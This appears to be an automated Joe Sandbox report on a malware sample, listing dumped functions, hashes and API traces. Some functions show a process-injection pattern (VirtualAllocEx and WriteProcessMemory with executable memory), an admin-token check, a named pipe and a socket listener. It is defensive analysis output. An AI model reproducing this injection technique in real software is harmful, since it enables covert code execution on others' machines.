Opcode ID: a936566e8ee73f1f464d71ea59e295fd0b1d7d5846b6daccba229110cac2efd6
Instruction ID: ffe88996324e7fd1f49478e92f8b12398cd60dbc162babee06c7f68c4d77c9b1
Opcode Fuzzy Hash: a936566e8ee73f1f464d71ea59e295fd0b1d7d5846b6daccba229110cac2efd6
Instruction Fuzzy Hash: E152F375E001598FDB48CF69D491AADBBF1EF4D300F14C16AE866AB386C234E951CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0676550C Relevance: 4.6, APIs: 3, Instructions: 57memoryinjectionCOMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0676552B

Part of subcall function 067758CD: __FF_MSGBANNER.LIBCMT ref: 067758F0
Part of subcall function 067758CD: __NMSG_WRITE.LIBCMT ref: 067758F7
Part of subcall function 067758CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C,067776FE), ref: 06775944

VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040,?,00000000,00000000,00000000,00000000,?), ref: 0676555E
WriteProcessMemory.KERNEL32(?,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000,?), ref: 06765576

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: AllocAllocateHeapMemoryProcessVirtualWrite_malloc
String ID:
API String ID: 4067662499-0
Opcode ID: feb1acf532916b40bb3e82a58698848a894b546f9c306c223a9b509d817a38a9
Instruction ID: f5584f73320892a439af9ce527130812bea7b282184f27576012bb3393bc36fe
Opcode Fuzzy Hash: feb1acf532916b40bb3e82a58698848a894b546f9c306c223a9b509d817a38a9
Instruction Fuzzy Hash: 2A01C072D00218BBEBA19EAA8C48B9FBFBAEF04750F204060BE00E6141D7719A50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0676BBA5 Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,74DF2E90,?,?,?,06766E7D), ref: 0676BBD8
CheckTokenMembership.ADVAPI32(00000000,?,06766E7D,?,?,?,06766E7D), ref: 0676BBED
FreeSid.ADVAPI32(?,?,?,?,06766E7D), ref: 0676BBFD

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: edfee64f9037efdfa64f7065f521bfd9a39cb92a6999794ae485cb095870abac
Instruction ID: adf01d1a4c2d0270a05ebdd3d52dac919d929960ec3c9af9bd49bc136174ae73
Opcode Fuzzy Hash: edfee64f9037efdfa64f7065f521bfd9a39cb92a6999794ae485cb095870abac
Instruction Fuzzy Hash: 6B013176D4528CFFDB11DBE88884AEDBFBCEB15200F54849AE601E3141D2705B04DB26

Uniqueness

Uniqueness Score: -1.00%

Function 06767E66 Relevance: 4.5, APIs: 3, Instructions: 11memorythreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

DeleteProcThreadAttributeList.KERNEL32(06767FED,?,06767FED,00000000,?), ref: 06767E6C
GetProcessHeap.KERNEL32(00000000,06767FED,?,06767FED,00000000,?), ref: 06767E77
HeapFree.KERNEL32(00000000,?,06767FED,00000000,?), ref: 06767E7E

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: Heap$AttributeDeleteFreeListProcProcessThread
String ID:
API String ID: 551783810-0
Opcode ID: 959b6623fc352b48aab8197fc5bd588c10985534b892cd0ba083cb97ee461c0a
Instruction ID: 683d757422d92a4c6ac1b754d00eb5a00a13bd10bd53b90ea05d643f5ac7381e
Opcode Fuzzy Hash: 959b6623fc352b48aab8197fc5bd588c10985534b892cd0ba083cb97ee461c0a
Instruction Fuzzy Hash: 18C0EA364C420CEFDB412BA1ED09A893E2AAB08A52FA08014F71989050CA7699509BA2

Uniqueness

Uniqueness Score: -1.00%

Function 06763801 Relevance: 1.5, APIs: 1, Instructions: 39pipeCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32(?,00000003,00000004,00000002,00000000,00000000,00000000,00000000), ref: 06763855

Part of subcall function 0676B5CD: VirtualAlloc.KERNEL32(00000000,0000000C,00003000,00000004,?,00000000,00000000,?,?,0676C02E,0676BF53,00000000,00000000,0100007F), ref: 0676B58E
Part of subcall function 0676B5CD: CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0676B5BD

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: Create$AllocNamedPipeThreadVirtual
String ID:
API String ID: 3121275779-0
Opcode ID: c93b8d31de3fd9c5b474dd4662adfb706dc17016679cba8ec1378851bd4e3bb3
Instruction ID: 8f1bbea60ab92760b5a431fc38f762a5703c1d4f32d7505622d6723d33615b92
Opcode Fuzzy Hash: c93b8d31de3fd9c5b474dd4662adfb706dc17016679cba8ec1378851bd4e3bb3
Instruction Fuzzy Hash: 73F0C8B1584309BEFB60AAA4AC89E963EED9701374F104364B775D50D1D2708D86CE70

Uniqueness

Uniqueness Score: -1.00%

Function 06785210 Relevance: .4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c1afc7b8c4cb1ba67bf296da86f31427154ca0421ce733367cd79445ec59c98
Instruction ID: c835c98378a3b582ebe30b4c5f03e2568291e286c774c7ba0438d7333781dc4d
Opcode Fuzzy Hash: 4c1afc7b8c4cb1ba67bf296da86f31427154ca0421ce733367cd79445ec59c98
Instruction Fuzzy Hash: 32128F319141598FCB08CF5DD891ABDBBF2EF49301F14C16AE556EB386CA38EA11DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0638464D Relevance: .4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc46112676e2f99f65351f06fd34e61db1380de43a5743537da4af89db485184
Instruction ID: 8323c70947989497b9fdc191682df657ed0fe341d1aea90bbd12ef03c8ab2391
Opcode Fuzzy Hash: bc46112676e2f99f65351f06fd34e61db1380de43a5743537da4af89db485184
Instruction Fuzzy Hash: 341283319141698FDB08CF9DC8D1ABDBBF1EF49301F54826EE4569B386CA38E612DB50

Uniqueness

Uniqueness Score: -1.00%

Function 06784C40 Relevance: .4, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed7d1785b25ec17c40b0785f7654a1d861003e7409460ac4236fcb43d1d6e141
Instruction ID: a94b46f4c57bcc145fd6a39a6a3265a26f9ec64d48474b13b79780eabf1e2df0
Opcode Fuzzy Hash: ed7d1785b25ec17c40b0785f7654a1d861003e7409460ac4236fcb43d1d6e141
Instruction Fuzzy Hash: 90126D319101998FCB08CF5DD4919BDBBF2EF49300F59C16AE596EB386C638EA11DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0638407D Relevance: .4, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b5766cd7a95bd6f764efa1aecf894e3aed280c26a93c7a4905d360df561bf92
Instruction ID: c9a003e5e683fbc5d5d4ac2a5808e16dbb26cd82dcd34b2596c722490fd7d8ec
Opcode Fuzzy Hash: 8b5766cd7a95bd6f764efa1aecf894e3aed280c26a93c7a4905d360df561bf92
Instruction Fuzzy Hash: A11260319101698FDB08CF5DC8D19BDBBF1FF4A300F59826AE456AB382C638E652DB50

Uniqueness

Uniqueness Score: -1.00%

Function 06782A9D Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: f7d5f711ebdc5f361cfb494cfb39f216485c25ea4e5b7852622aa4b8e4eb84d6
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: 22D18073C5A9B34E87B6952D415813AEFA26FC195231FC7E1DCE03F28AE1269E01D6D0

Uniqueness

Uniqueness Score: -1.00%

Function 06381EDA Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: 8e739d1b62c55b6632b37bd79c85eb2f197ab690d9804fa766bc0b3b4ba634d8
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: 2FD1A1B3C1EAB70E87B5912E80542BBEAA26FC154031FC3E19CD43F289C62B5D59D2D0

Uniqueness

Uniqueness Score: -1.00%

Function 0678267D Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: 882f8acb0dcbf6cdcb3423c505d85c92d24b674a4e32d09d2d6a0f9feed831e5
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: 17D1A073C5A9B34E87B6952D415813AEBA26FC165231FC7E2CCE43F28AD2265E01C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 06381ABA Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: a3cc5a6e181fdbe44800991196e81c05e51a84d7a394bdbaf4b0fc69c00b41a1
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: 9BD1A473C1EAB70E87B5916E80542BBEA626FC154131FC3E1CCD43F289D22A5D5AC6D0

Uniqueness

Uniqueness Score: -1.00%

Function 06782271 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: 6d86e507905787f100476358ce5ab6ddf4bbc9cfa3072fdcac0355e710459fe3
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: 35C1C073C9A9B34E87B6952D416813BEFA26FC155231FC7E18CE43F68AD1265E01C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 063816AE Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: 9061aac229d82e1d385776a7ec0395ea1403a83824c592516bc63e15e22e5cef
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: 8BC18073C1EAB70E87B5916E80582BBEA626FC155031FC3E0DCD43F289D16A5D5AC6D0

Uniqueness

Uniqueness Score: -1.00%

Function 06781E9D Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: 6c8957f4f3346aca39165db175602076249353b837002f465fbb2c6eec6ffe30
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: 74C1AE73D6A9B34E87B5912D456813AEFA26FC154232FC7E18CE02F68AD6275E01C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 063812DA Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: 7d37e73b190afcd6d64be3637083fe786508f204cd4a272e4ec63644ff9c9394
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: 18C180B3D1EBB30E87B5916E84586BBEE626FC154031FC3E08CD42F289D16A5D5AC6D0

Uniqueness

Uniqueness Score: -1.00%

Function 06769641 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66815fa4e515433c11deb6288a89f5de42c04bc31794f64a68d3cfb98a76f997
Instruction ID: a3dfe08c4b631b68f282a615907a4235586a48c7368a151e818a5abf15a84c79
Opcode Fuzzy Hash: 66815fa4e515433c11deb6288a89f5de42c04bc31794f64a68d3cfb98a76f997
Instruction Fuzzy Hash: 8E91A074E0521ACFCF48CF9AC5909AEBBB1BF48305F248159EA156B325D331AA81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0676A2E1 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66815fa4e515433c11deb6288a89f5de42c04bc31794f64a68d3cfb98a76f997
Instruction ID: 40d3777c03ca0dbf5c2fdc3fa77a0797cd8ec702dc91da579e410b2e0d10dcd6
Opcode Fuzzy Hash: 66815fa4e515433c11deb6288a89f5de42c04bc31794f64a68d3cfb98a76f997
Instruction Fuzzy Hash: 87919CB4E0120ACFCF48CF9AC5909AEBBB1FF49215F248159E915BB315D335AA81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0636971E Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66815fa4e515433c11deb6288a89f5de42c04bc31794f64a68d3cfb98a76f997
Instruction ID: d04ab159d240f4f69c645f34a061319de13796b819cd527c73dc08bc9907cb21
Opcode Fuzzy Hash: 66815fa4e515433c11deb6288a89f5de42c04bc31794f64a68d3cfb98a76f997
Instruction Fuzzy Hash: B891C074E0121ACFCF48CF99C590AAEBBB2FF48315F248159E9156B359D330AA81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 06368A7E Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66815fa4e515433c11deb6288a89f5de42c04bc31794f64a68d3cfb98a76f997
Instruction ID: f6f133952d61ac0c06f176546030618f7db8aae01afe8d7cf0ec32bd91754b38
Opcode Fuzzy Hash: 66815fa4e515433c11deb6288a89f5de42c04bc31794f64a68d3cfb98a76f997
Instruction Fuzzy Hash: 219190B4E0120ACFCF48CF99C5909AEBBB1FF48305F149559E9166B355D331AA81CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 063927F1 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a0e62f61d2487343c68d546d0fed2b5e277ec55e342f27ca8efb465afa3f918
Instruction ID: fe53e20f2245747760e792889993647eccd00cfff9ad69151155c3e61517138d
Opcode Fuzzy Hash: 7a0e62f61d2487343c68d546d0fed2b5e277ec55e342f27ca8efb465afa3f918
Instruction Fuzzy Hash: E4418435A14A05EFDB19CF1DC89096ABBF1FF89350715C06DE49A8B322D231EA45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 06772BF1 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: 5dde43d74029cb4dbb7085227fab2d76318d437e32ed71f1129d6b4c6d31b039
Instruction ID: 3ab2178d448365cc1bed3dfb63d50203f5ffd45e5710462f3bc31a03bda23678
Opcode Fuzzy Hash: 5dde43d74029cb4dbb7085227fab2d76318d437e32ed71f1129d6b4c6d31b039
Instruction Fuzzy Hash: E8414972E00209AFDF54DFA8C884AAEB7B5EF48320F258569E925E7341D634EA01DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0637202E Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Offset: 06360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6360000_2.jbxd

Yara matches

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: 6f49ffeb4de8a6dae6a4fbdb1799945e1415dc23d48da8c464bfb278c9a6bcc2
Instruction ID: d02718d5a6562a34e5f61eca2fbd7024aa6673dd7e4e72b42001fdb6bfa9e8eb
Opcode Fuzzy Hash: 6f49ffeb4de8a6dae6a4fbdb1799945e1415dc23d48da8c464bfb278c9a6bcc2
Instruction Fuzzy Hash: A9410076E00209AFDB54DFA9CC81AAEB7B6FF48310F15816DE915E7341D638AA05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 067849E5 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0711cd310e6f94b7c911e98286685cc64d690df2a81c203f9e3cddedb5a09aae
Instruction ID: 13be986dda62088a1779b8a3b161353d8891bb2c7fa3656680c68003c61b7a16
Opcode Fuzzy Hash: 0711cd310e6f94b7c911e98286685cc64d690df2a81c203f9e3cddedb5a09aae
Instruction Fuzzy Hash: 9E41A374A140688FCF58CF9DE8918EDBBF2FB4E341B55810AE646B7385C638A910CF64

Uniqueness

Uniqueness Score: -1.00%

Function 067677BE Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 210networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

htonl.WS2_32(?), ref: 067677F8
select.WS2_32(00000000,?,?,?,?), ref: 0676785C
__WSAFDIsSet.WS2_32(00000000,?), ref: 06767878
accept.WS2_32(00000000,00000000,00000000), ref: 0676788D
ioctlsocket.WS2_32(00000000,8004667E,?), ref: 067678A0

Part of subcall function 067671C4: _malloc.LIBCMT ref: 067671CB
Part of subcall function 067671C4: GetTickCount.KERNEL32 ref: 067671EB

Part of subcall function 06761683: _malloc.LIBCMT ref: 06761689

Part of subcall function 067616D3: htonl.WS2_32(0000001F), ref: 067616D9

Part of subcall function 06761765: _memset.LIBCMT ref: 06761773

__WSAFDIsSet.WS2_32(00000000,?), ref: 0676792D
accept.WS2_32(00000000,00000000,00000000), ref: 0676793F
closesocket.WS2_32(?), ref: 06767A4D

Strings

d, xrefs: 067677D8

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
